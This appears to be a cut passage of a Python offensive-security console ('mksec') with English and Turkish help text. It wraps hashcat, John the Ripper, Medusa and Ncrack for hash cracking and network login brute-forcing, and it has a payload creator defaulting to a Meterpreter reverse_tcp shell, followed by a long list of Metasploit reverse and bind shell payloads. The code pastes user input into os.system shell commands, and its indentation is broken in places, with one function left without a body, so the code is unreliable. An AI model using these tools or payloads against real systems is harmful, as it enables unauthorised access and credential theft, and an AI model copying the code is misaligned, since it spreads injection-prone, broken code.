#1 | Documents\n 9820 | MS Office <= 2003 $3, SHA1 + RC4, collider #2 | Documents\n 18400 | Open Document Format (ODF) 1.2 (SHA-256, AES) | Documents\n 18600 | Open Document Format (ODF) 1.1 (SHA-1, Blowfish) | Documents\n 16200 | Apple Secure Notes | Documents\n 15500 | JKS Java Key Store Private Keys (SHA1) | Password Managers\n 6600 | 1Password, agilekeychain | Password Managers\n 8200 | 1Password, cloudkeychain | Password Managers\n 9000 | Password Safe v2 | Password Managers\n 5200 | Password Safe v3 | Password Managers\n 6800 | LastPass + LastPass sniffed | Password Managers\n 13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) | Password Managers\n 11300 | Bitcoin/Litecoin wallet.dat | 
Password Managers\n 16600 | Electrum Wallet (Salt-Type 1-3) | Password Managers\n 21700 | Electrum Wallet (Salt-Type 4) | Password Managers\n 21800 | Electrum Wallet (Salt-Type 5) | Password Managers\n 12700 | Blockchain, My Wallet | Password Managers\n 15200 | Blockchain, My Wallet, V2 | Password Managers\n 18800 | Blockchain, My Wallet, Second Password (SHA256) | Password Managers\n 23100 | Apple Keychain | Password Managers\n 16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256 | Password Managers\n 15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256 | Password Managers\n 15700 | Ethereum Wallet, SCRYPT | Password Managers\n 22500 | MultiBit Classic .key (MD5) | Password Managers\n 22700 | MultiBit HD (scrypt) | Password Managers\n 11600 | 7-Zip | Archives\n 12500 | RAR3-hp | Archives\n 13000 | RAR5 | Archives\n 17200 | PKZIP (Compressed) | Archives\n 17220 | PKZIP (Compressed Multi-File) | Archives\n 17225 | PKZIP (Mixed Multi-File) | Archives\n 17230 | PKZIP (Mixed Multi-File Checksum-Only) | Archives\n 17210 | PKZIP (Uncompressed) | Archives\n 20500 | PKZIP Master Key | Archives\n 20510 | PKZIP Master Key (6 byte optimization) | Archives\n 14700 | iTunes backup < 10.0 | Archives\n 14800 | iTunes backup >= 10.0 | Archives\n 23001 | SecureZIP AES-128 | Archives\n 23002 | SecureZIP AES-192 | Archives\n 23003 | SecureZIP AES-256 | Archives\n 13600 | WinZip | Archives\n 18900 | Android Backup | Archives\n 13200 | AxCrypt | Archives\n 13300 | AxCrypt in-memory SHA1 | Archives\n 8400 | WBB3 (Woltlab Burning Board) | Forums, CMS, E-Commerce\n 2611 | vBulletin < v3.8.5 | Forums, CMS, E-Commerce\n 2711 | vBulletin >= v3.8.5 | Forums, CMS, E-Commerce\n 2612 | PHPS | Forums, CMS, E-Commerce\n 121 | SMF (Simple Machines Forum) > v1.1 | Forums, CMS, E-Commerce\n 3711 | MediaWiki B type | Forums, CMS, E-Commerce\n 4521 | Redmine | Forums, CMS, E-Commerce\n 11 | Joomla < 2.5.18 | Forums, CMS, E-Commerce\n 13900 | OpenCart | Forums, CMS, E-Commerce\n 11000 | PrestaShop | Forums, CMS, 
E-Commerce\n 16000 | Tripcode | Forums, CMS, E-Commerce\n 7900 | Drupal7 | Forums, CMS, E-Commerce\n 21 | osCommerce, xt:Commerce | Forums, CMS, E-Commerce\n 4522 | PunBB | Forums, CMS, E-Commerce\n 2811 | MyBB 1.2+, IPB2+ (Invision Power Board) | Forums, CMS, E-Commerce\n 18100 | TOTP (HMAC-SHA1) | One-Time Passwords\n 2000 | STDOUT | Plaintext\nbackback9 | Plaintext | Plaintext\n 21600 | Web2py pbkdf2-sha512 | Framework\n 10000 | Django (PBKDF2-SHA256) | Framework\n 124 | Django (SHA-1) | Framework\n")
elif "--brute" in uinput.lower():
print("? | \x1b[33mCharset\x1b[37m\n==+=========\nl | abcdefghijklmnopqrstuvwxyzu | ABCDEFGHIJKLMNOPQRSTUVWXYZ\nd | 0123456789\nh | 0123456789abcdef\nH | 0123456789ABCDEF\ns | !#*+,-.^_`{|}\na | ?l?u?d?s\nb | 0x00 - 0xff\n\n\x1b[33mUsage:\x1b[37m\n\x1b[33m======\x1b[37m\n\x1b[32mex:\x1b[37m mert123* = ?l?l?l?l?d?d?d?s\n\x1b[32mex:\x1b[37m mert123* = ?a?a?a?a?a?a?a?a")
elif "run" == uinput.lower():
print("\x1b[1m\x1b[31m'Command not found. You can check the run command by typing 'info'\x1b[1m")
elif "run -w" == uinput.lower():
os.system("sudo hashcat -a 0 -m " + hashmode + " " + hash + " " + wordlist)
elif "run -b" == uinput.lower():
os.system("sudo hashcat -a 3 -m " + hashmode + " " + hash + " " + bruteforce)
def john():
    """Interactive console for John the Ripper (wordlist-based hash cracking).

    Commands (read in a loop, never returns normally):
      info                      -- bilingual (EN/TR) usage text
      options                   -- table of current settings
      set LIST/FIND/FORMAT/WORDLIST/HASH <value>
      run --hash list / run -hl -- list crackable hash formats
      run --search / run -s     -- grep the format list for FIND
      run -x                    -- crack HASH with FORMAT and WORDLIST
    """
    # Settings start as a single space so the 'options' table shows an
    # empty-looking cell; .center(25) below keeps the table columns aligned.
    hashlist = " "
    search = " "
    format = " "  # NOTE: shadows the builtin; kept to match the file's convention
    wordlist = " "
    hash = " "    # NOTE: shadows the builtin; kept to match the file's convention
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[john]\033[37m\x1b[0m ")
        UserInputs(uinput+"pass")  # global command hook (back/exit handled elsewhere)
        if uinput.lower() == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mIt breaks one-way encryption algorithms (hashes) with wordlist.\nUsage:\nYou do not need to fill in \x1b[36m'LIST'\x1b[37m to see the hash list. Just type \x1b[36m'run --hash list' \x1b[37mor \x1b[36m'run -hl'\x1b[37m.\nTo search in the hash list, fill in \x1b[36m'FIND'\x1b[37m and type \x1b[32m'run --search' \x1b[36mor\x1b[37m 'run -s'\x1b[37m.\nTo hash hash using Wordlist, fill in \x1b[36m'FORMAT'\x1b[37m, \x1b[36m'WORDLIST'\x1b[37m and \x1b[36m'HASH'\x1b[37m and type \x1b[36m'run -x'\x1b[37m.\n\n\x1b[33mTR:\x1b[37mWordlist ile tek yönlü şifreleme algoritmalarını (hashes) kırar. \nKullanımı:\nHash listesini görmek için \x1b[36m'LIST'\x1b[37m kısmını doldurmanıza gerek yoktur. Sadece \x1b[36m'run --hash list'\x1b[37m ya da \x1b[36m'run -hl'\x1b[37m yazın.\nHash listesi içerisinde arama yapmak için \x1b[36m'FIND'\x1b[37m kısmını doldurun ve \x1b[36m'run --search'\x1b[37m or \x1b[36m'run -s'\x1b[37m yazın.\nWordlist kullanarak hash kırmak için \x1b[36m'FORMAT'\x1b[37m, \x1b[36m'WORDLIST'\x1b[37m ve \x1b[36m'HASH'\x1b[37m kısımlarını doldurup \x1b[36m'run -x'\x1b[37m yazın.\n")
        elif uinput.lower() == "options":
            # FIX: the original passed hashlist[::-1], which printed the LIST
            # value reversed once set (the sibling consoles print it plain).
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nLIST {} NO Lists hashes that can be cracked. \x1b[33musage: 'run --hash list' or 'run -hl'\x1b[37m\nFIND {} NO Searches within breakable hashes \x1b[32mex: MD5\x1b[37m \x1b[33musage: 'run --search' or 'run -s'\x1b[37m\nFORMAT {} YES Specify the hash format \x1b[32mex: Raw-MD5\x1b[37m\nWORDLIST{} YES Specify the wordlist you will use to crack the hash \x1b[32mex: /root/Desktop/wordlist.txt\x1b[37m\nHASH {} YES Enter the file with hash in it \x1b[32mex: /root/Desktop/hash.txt\x1b[37m".format(hashlist,search,format,wordlist,hash))
        elif "set list" in uinput.lower():
            hashlist = uinput
            hashlist = hashlist.replace("set list ","").replace("set LIST ","").replace("SET list ","").replace("SET LIST ","").center(25)
        elif "set find" in uinput.lower():
            search = uinput
            search = search.replace("set find ","").replace("set FIND ","").replace("SET find ","").replace("SET FIND ","").center(25)
        elif "set format" in uinput.lower():
            format = uinput
            format = format.replace("set format ","").replace("set FORMAT ","").replace("SET format ","").replace("SET FORMAT ","").center(25)
        elif "set wordlist" in uinput.lower():
            wordlist = uinput
            wordlist = wordlist.replace("set wordlist ","").replace("set WORDLIST ","").replace("SET wordlist ","").replace("SET WORDLIST ","").center(25)
        elif "set hash" in uinput.lower():
            hash = uinput
            hash = hash.replace("set hash ","").replace("set HASH ","").replace("SET hash ","").replace("SET HASH ","").center(25)
        elif "run" == uinput.lower():
            print("\x1b[1m\x1b[31mCommand not found. You can check the run command by typing 'info'\x1b[1m")
        elif "run --hash list" == uinput.lower() or "run -hl" == uinput.lower():
            os.system("john --list=formats")
        elif "run --search" == uinput.lower() or "run -s" == uinput.lower():
            # NOTE(review): user input is interpolated straight into a shell
            # command (injection by design -- the whole tool wraps CLIs).
            os.system("john --list=formats | grep -i " + search.strip())
        elif "run -x" == uinput.lower():
            os.system("john --format=" + format.strip() + " --wordlist=" + wordlist.strip() + " " + hash.strip())
def medusa():
    """Interactive console wrapping the Medusa network login brute-forcer.

    Reads commands in an endless loop: 'info' prints bilingual help,
    'options' shows the current settings table, 'set IP/SERVICE/USERLIST/
    PASSLIST <value>' stores a setting, and 'run' launches medusa.
    """
    target = " "
    service = " "
    user_list = " "
    pass_list = " "

    def _read_option(raw, name):
        # Strip every case variant of "set <name> " from the raw command
        # and pad to 25 columns so the 'options' table stays aligned.
        lo, up = name.lower(), name.upper()
        for prefix in ("set " + lo + " ", "set " + up + " ",
                       "SET " + lo + " ", "SET " + up + " "):
            raw = raw.replace(prefix, "")
        return raw.center(25)

    while True:
        command = input("\x1b[1m\033[36m[mksec]\033[36m[medusa]\033[37m\x1b[0m ")
        UserInputs(command + "pass")  # global command hook defined elsewhere
        lowered = command.lower()
        if lowered == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mWordlist attack on services.\n\x1b[33mTR:\x1b[37mServislere yönelik wordlist saldırısı.")
        elif lowered == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIP {} YES Target ip address \x1b[32mex: 108.96.10.8\x1b[37m\nSERVICE {} YES Which service? \x1b[32mex: ftp\x1b[37m\nUSERLIST {} YES Enter a wordlist with usernames \x1b[32mex: /root/Desktop/username.txt\x1b[37m\nPASSLIST {} YES Enter a wordlist with passwords \x1b[32mex: /root/Desktop/passwords.txt\x1b[37m".format(target, service, user_list, pass_list))
        elif "set ip" in lowered:
            target = _read_option(command, "ip")
        elif "set service" in lowered:
            service = _read_option(command, "service")
        elif "set userlist" in lowered:
            user_list = _read_option(command, "userlist")
        elif "set passlist" in lowered:
            pass_list = _read_option(command, "passlist")
        elif lowered == "run":
            os.system("sudo medusa -h " + target.strip() + " -M " + service.strip() + " -U " + user_list.strip() + " -P " + pass_list.strip())
            print("Process Completed")
def ncrack():
    """Interactive console wrapping the Ncrack network authentication cracker.

    Commands (read in an endless loop): 'info' prints bilingual help,
    'options' shows the settings table, 'set IP/PORT/USERLIST/PASSLIST',
    '--services and ports' / '-sap' prints a service-to-port cheat sheet,
    and 'run' launches ncrack against IP:PORT.
    """
    # Settings start as a single space; .center(25) keeps the table aligned.
    ip = " "
    port = " "
    userlist = " "
    passlist = " "
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[ncrack]\033[37m\x1b[0m ")
        UserInputs(uinput+"pass")  # global command hook defined elsewhere
        if uinput.lower() == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mWordlist attack on services.\n\x1b[33mTR:\x1b[37mServislere yönelik wordlist saldırısı.")
        elif uinput.lower() == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIP {} YES Target ip address \x1b[32mex: 108.96.10.8\x1b[37m\nPORT {} YES Which service? Type \x1b[33m'--services and ports' \x1b[35mor\x1b[33m '-sap'\x1b[37m to see the ports used by the services. \x1b[32mex: ftp\x1b[37m\nUSERLIST {} YES Enter a word list with usernames in it \x1b[32mex: /root/Desktop/username.txt\x1b[37m\nPASSLIST {} YES Enter a word list with passwords \x1b[32mex: /root/Desktop/passwords.txt\x1b[37m".format(ip,port,userlist,passlist))
        elif "set ip" in uinput.lower():
            ip = uinput
            ip = ip.replace("set ip ","").replace("set IP ","").replace("SET ip ","").replace("SET IP ","").center(25)
        elif "set port" in uinput.lower():
            port = uinput
            port = port.replace("set port ","").replace("set PORT ","").replace("SET port ","").replace("SET PORT ","").center(25)
        elif "set userlist" in uinput.lower():
            userlist = uinput
            userlist = userlist.replace("set userlist ","").replace("set USERLIST ","").replace("SET userlist ","").replace("SET USERLIST ","").center(25)
        elif "set passlist" in uinput.lower():
            passlist = uinput
            passlist = passlist.replace("set passlist ","").replace("set PASSLIST ","").replace("SET passlist ","").replace("SET PASSLIST ","").center(25)
        elif "--services and ports" == uinput.lower() or "-sap" == uinput.lower():
            # FIXES vs. original cheat sheet:
            #  - "RPD = 3989" corrected to "RDP = 3389" (standard RDP port)
            #  - MSSQL entry had a broken ANSI escape "\x1b[33z" -> "\x1b[33m"
            #  - MQTT corrected 143 -> 1883 and DICOM 1883 -> 104 (values had
            #    shifted by one row; 143 is IMAP, 1883 is MQTT)
            print("\x1b[1m\nFTP = \x1b[33m21\x1b[37m\nSSH = \x1b[33m22\x1b[37m\nTelnet = \x1b[33m23\x1b[37m\nVNC = \x1b[33m5900\x1b[37m\nRDP = \x1b[33m3389\x1b[37m\nMySQL = \x1b[33m3306\x1b[37m\nPostgreSQL = \x1b[33m5432\x1b[37m\nMSSQL = \x1b[33m1433\x1b[37m\nMongoDB = \x1b[33m27017\x1b[37m\nSMB = \x1b[33m'139' \x1b[35mor\x1b[33m '445'\x1b[37m\nHTTP(S) = \x1b[33m'80' \x1b[35mor\x1b[33m '443'\x1b[37m\nPOP3(S) = \x1b[33m'110' \x1b[35mor\x1b[33m '995'\x1b[37m\nIMAP = \x1b[33m143\x1b[37m\nCVS = \x1b[33m2401\x1b[37m\nMQTT = \x1b[33m1883\x1b[37m\nDICOM = \x1b[33m104\x1b[37m\nSIP = \x1b[33m5060\x1b[37m\nRedis = \x1b[33m6379\x1b[37m\nCassandra = \x1b[33m9042\x1b[37m\n")
        elif "run" == uinput.lower():
            # NOTE(review): user input is interpolated into a shell command
            # (injection by design -- the whole tool wraps CLIs).
            os.system("sudo ncrack -p " + port.strip() + " -U " + userlist.strip() + " -P " + passlist.strip() + " " + ip.strip())
            print("Process Completed")
def hashIdentifier():
    """Interactive console around hash-identifier (with hashid fallback).

    'set SEARCH <digest>' stores the hash value; 'run' invokes
    hash-identifier on it, 'run -f' invokes hashid instead.  Loops forever.
    """
    search = " "
    while True:
        command = input("\x1b[1m\033[36m[mksec]\033[36m[hash-identifier]\033[37m\x1b[0m ")
        UserInputs(command + "pass")  # global command hook defined elsewhere
        lowered = command.lower()
        if lowered == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mHash Identifier is a tool that detects the encrypted hash algorithm. \x1b[36m'run'\x1b[37m command does not work, try with \x1b[36m'run -f'\x1b[37m (-f : --force). \n\x1b[33mTR:\x1b[37mHash Identifier, kriptolanan hash/şifre algoritmasını tespit eden bir araçtır. \x1b[36m'run'\x1b[37m komutu çalışmazsa \x1b[36m'run -f'\x1b[37m (-f : --force) ile deneyiniz.")
        elif lowered == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nSEARCH{} YES Hash value \x1b[32mex: 55e8bb2e1b456ebbec8ae5ba64311a2c\x1b[37m".format(search))
        elif "set search" in lowered:
            # Drop every case variant of the "set search " prefix, then pad
            # to 50 columns so the options table stays aligned.
            stripped = command
            for prefix in ("set search ", "set SEARCH ", "SET search ", "SET SEARCH "):
                stripped = stripped.replace(prefix, "")
            search = stripped.center(50)
        elif lowered == "run":
            os.system("hash-identifier " + search.strip())
            print("Process Completed")
        elif lowered == "run -f":
            os.system("hashid " + search.strip())
            print("Process Completed")
def wordlists():
    """Browse the wordlist files shipped with Kali Linux.

    On Kali: repeatedly clears the screen, lists files matching 'wordlist'
    via locate plus the contents of /usr/share/wordlists, then waits for
    input; 'q' clears the screen and jumps back to passwordAttacks()
    (a recursive call, not a return).  On any other system it loops printing
    a bilingual "Kali only" notice.
    """
    # FIX: read the whole `uname -v` output instead of token [3] -- the
    # original split(" ")[3] raised IndexError on short version strings;
    # "kali" appearing anywhere in the version line is the same signal.
    kernel = os.popen('uname -v').read()
    if "kali" in kernel:
        while 1:
            os.system("clear")
            print("\x1b[1m\n\x1b[31m*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\x1b[33mWordlist Files\x1b[31m*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\x1b[37m\n\n\x1b[0m\x1b[2m")
            os.system("locate wordlist")
            print("\x1b[1m\n\n\x1b[31m*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\x1b[33mWordlist Directories\x1b[31m*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\x1b[37m\n\n\x1b[0m\x1b[2m")
            os.system("cd /usr/share/wordlists && ls -l")
            print("\x1b[1m")
            r = input('Press "q" to exit\n\n\x1b[1m\033[36m[mksec]\033[36m[wordlist]\033[37m\x1b[0m ')
            if r == "q":
                os.system("clear")
                passwordAttacks()  # defined elsewhere in this file
    else:
        while 1:
            print("\x1b[1m\x1b[36mEN:\x1b[31mOnly for those using the kali linux operating system.\n\x1b[36mTR:\x1b[31mSadece kali linux işletim sistemini kullananlar için.")
            uinput = input("\x1b[1m\033[36m[mksec]\033[36m[wordlist]\033[37m\x1b[0m ")
            UserInputs(uinput+"pass")  # global command hook defined elsewhere
def PayloadCreatorAndListener():
def PayloadCreater():
payload = " windows/meterpreter/reverse_tcp "
host = " <IP> "
port = " 4444 "
format = " exe "
output = " "
youriface = os.popen('ip addr').read().split("2:")[1].split(":")[0]
ipv4 = os.popen('ip addr show {}'.format(youriface)).read().split("inet ")[1].split("/")[0]
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[payload_creator]\033[37m\x1b[0m ")
UserInputs(uinput+"exp")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mIt is a payload creator. \x1b[36m'run'\x1b[37m command does not work, try with \x1b[36m'run -f'\x1b[37m (-f : --force). \n\x1b[33mTR:\x1b[37mBir payload üretme aracıdır. \x1b[36m'run'\x1b[37m komutu çalışmazsa \x1b[36m'run -f'\x1b[37m (-f : --force) ile deneyiniz.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nPAYLOAD{} YES Type '--list payloads' or '-lp' to see payloads \x1b[32mDefault: windows/meterpreter/reverse_tcp\x1b[37m\nLHOST {} YES Your IP address = \x1b[32m{}\x1b[37m\nLPORT {} YES Type in port \x1b[32mDefault = 4444\x1b[37m\nFORMAT {} YES Specify the payload format \x1b[32mDefault = exe\x1b[37m\nOUTPUT {} YES Output \x1b[32mex: /root/Desktop/mksec.exe\x1b[37m".format(payload,host,ipv4,port,format,output))
elif "set payload" in uinput.lower():
payload = uinput
payload = payload.replace("set payload ","").replace("set PAYLOAD ","").replace("SET payload ","").replace("SET PAYLOAD ","").center(50)
elif "set lhost" in uinput.lower():
host = uinput
host = host.replace("set lhost ","").replace("set LHOST ","").replace("SET lhost ","").replace("SET LHOST ","").center(50)
elif "set port" in uinput.lower():
port = uinput
port = port.replace("set lport ","").replace("set LPORT ","").replace("SET lport ","").replace("SET LPORT ","").center(50)
elif "set format" in uinput.lower():
format = uinput
format = format.replace("set format ","").replace("set FORMAT ","").replace("SET format ","").replace("SET FORMAT ","").center(50).lower()
elif "set output" in uinput.lower():
output = uinput
output = output.replace("set output ","").replace("set OUTPUT ","").replace("SET output ","").replace("SET OUTPUT ","").center(50)
elif "--list payload" in uinput.lower() or "-lp" == uinput.lower():
print("""\x1b[1m\x1b[33mFramework Payloads (592 total)\x1b[37m\n\x1b[33m==================================================\x1b[37m\n\n\x1b[33mName\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m----\x1b[37m \x1b[33m-----------\x1b[37m\naix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell\naix/ppc/shell_find_port Spawn a shell on an established connection\naix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)\naix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nandroid/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP\nandroid/meterpreter/reverse_https Run a meterpreter server in Android. Tunnel communication over HTTPS\nandroid/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager\nandroid/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell\nandroid/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell\nandroid/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell\nandroid/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP\nandroid/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS\nandroid/shell/reverse_tcp Spawn a piped command shell (sh). 
Connect back stager\napple_ios/aarch64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\napple_ios/aarch64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\napple_ios/aarch64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\napple_ios/aarch64/shell_reverse_tcp Connect back to attacker and spawn a command shell\napple_ios/armle/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\napple_ios/armle/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\napple_ios/armle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nbsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell\nbsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/vax/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/x64/exec Execute an arbitrary command\nbsd/x64/shell_bind_ipv6_tcp Listen for a connection and spawn a command shell over IPv6\nbsd/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port\nbsd/x64/shell_bind_tcp_small Listen for a connection and spawn a command shell\nbsd/x64/shell_reverse_ipv6_tcp Connect back to attacker and spawn a command shell over IPv6\nbsd/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/x64/shell_reverse_tcp_small Connect back to attacker and spawn a command shell\nbsd/x86/exec Execute an arbitrary command\nbsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service\nbsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service\nbsd/x86/shell/bind_ipv6_tcp Spawn a command shell (staged). Listen for a connection over IPv6\nbsd/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nbsd/x86/shell/find_tag Spawn a command shell (staged). 
Use an established connection\nbsd/x86/shell/reverse_ipv6_tcp Spawn a command shell (staged). Connect back to the attacker over IPv6\nbsd/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nbsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nbsd/x86/shell_bind_tcp_ipv6 Listen for a connection and spawn a command shell over IPv6\nbsd/x86/shell_find_port Spawn a shell on an established connection\nbsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)\nbsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6\nbsdi/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nbsdi/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nbsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nbsdi/x86/shell_find_port Spawn a shell on an established connection\nbsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\ncmd/mainframe/apf_privesc_jcl (Elevate privileges for user. Adds SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using an unsecured/updateable APF authorized library (APFLIB) and updating the user's ACEE using this program/library. Note: This privesc only works with z/OS systems using RACF, no other ESM is supported.)\ncmd/mainframe/bind_shell_jcl Provide JCL which creates a bind shell This implmentation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.\ncmd/mainframe/generic_jcl Provide JCL which can be used to submit a job to JES2 on z/OS which will exit and return 0. 
This can be used as a template for other JCL based payloads\ncmd/mainframe/reverse_shell_jcl Provide JCL which creates a reverse shell This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.\ncmd/unix/bind_awk Listen for a connection and spawn a command shell via GNU AWKcmd/unix/bind_busybox_telnetd Listen for a connection and spawn a command shell via BusyBox telnetdcmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)cmd/unix/bind_jjs Listen for a connection and spawn a command shell via jjs\ncmd/unix/bind_lua Listen for a connection and spawn a command shell via Lua\ncmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat\ncmd/unix/bind_netcat_gaping Listen for a connection and spawn a command shell via netcat\ncmd/unix/bind_netcat_gaping_ipv6 Listen for a connection and spawn a command shell via netcat\ncmd/unix/bind_nodejs Continually listen for a connection and spawn a command shell via nodejs\ncmd/unix/bind_perl Listen for a connection and spawn a command shell via perl\ncmd/unix/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl\ncmd/unix/bind_r Continually listen for a connection and spawn a command shell via R\ncmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby\ncmd/unix/bind_ruby_ipv6 Continually listen for a connection and spawn a command shell via Ruby\ncmd/unix/bind_socat_udp Creates an interactive shell via socat\ncmd/unix/bind_stub Listen for a connection and spawn a command shell (stub only, no payload)\ncmd/unix/bind_zsh Listen for a connection and spawn a command shell via Zsh. 
Note: Although Zsh is often available, please be aware it isn't usually installed by default.\ncmd/unix/generic Executes the supplied command\ncmd/unix/interact Interacts with a shell on an established socket connection\ncmd/unix/pingback_bind Accept a connection, send a UUID, then exit\ncmd/unix/pingback_reverse Creates a socket, send a UUID, then exit\ncmd/unix/reverse Creates an interactive shell through two inbound connections\ncmd/unix/reverse_awk Creates an interactive shell via GNU AWK\ncmd/unix/reverse_bash Creates an interactive shell via bash's builtin /dev/tcp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bashwithout the /dev/tcp feature.\ncmd/unix/reverse_bash_telnet_ssl Creates an interactive shell via mkfifo and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL.\ncmd/unix/reverse_bash_udp Creates an interactive shell via bash's builtin /dev/udp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bashwithout the /dev/udp feature.\ncmd/unix/reverse_jjs Connect back and create a command shell via jjs\ncmd/unix/reverse_ksh Connect back and create a command shell via Ksh. 
Note: Although Ksh is often available, please be aware it isn't usually installed by default.\ncmd/unix/reverse_lua Creates an interactive shell via Lua\ncmd/unix/reverse_ncat_ssl Creates an interactive shell via ncat, utilizing ssl mode\ncmd/unix/reverse_netcat Creates an interactive shell via netcat\ncmd/unix/reverse_netcat_gaping Creates an interactive shell via netcat\ncmd/unix/reverse_nodejs Continually listen for a connection and spawn a command shell via nodejs\ncmd/unix/reverse_openssl Creates an interactive shell through two inbound connections\ncmd/unix/reverse_perl Creates an interactive shell via perl\ncmd/unix/reverse_perl_ssl Creates an interactive shell via perl, uses SSL\ncmd/unix/reverse_php_ssl Creates an interactive shell via php, uses SSL\ncmd/unix/reverse_python Connect back and create a command shell via Python\ncmd/unix/reverse_python_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design.\ncmd/unix/reverse_r Connect back and create a command shell via R\ncmd/unix/reverse_ruby Connect back and create a command shell via Ruby\ncmd/unix/reverse_ruby_ssl Connect back and create a command shell via Ruby, uses SSL\ncmd/unix/reverse_socat_udp Creates an interactive shell via socat\ncmd/unix/reverse_ssh Connect back and create a command shell via SSH\ncmd/unix/reverse_ssl_double_telnet Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option\ncmd/unix/reverse_stub Creates an interactive shell through an inbound connection (stub only, no payload)\ncmd/unix/reverse_tclsh Creates an interactive shell via Tclsh\ncmd/unix/reverse_zsh Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.\ncmd/windows/adduser Create a new user and add them to local administration group. 
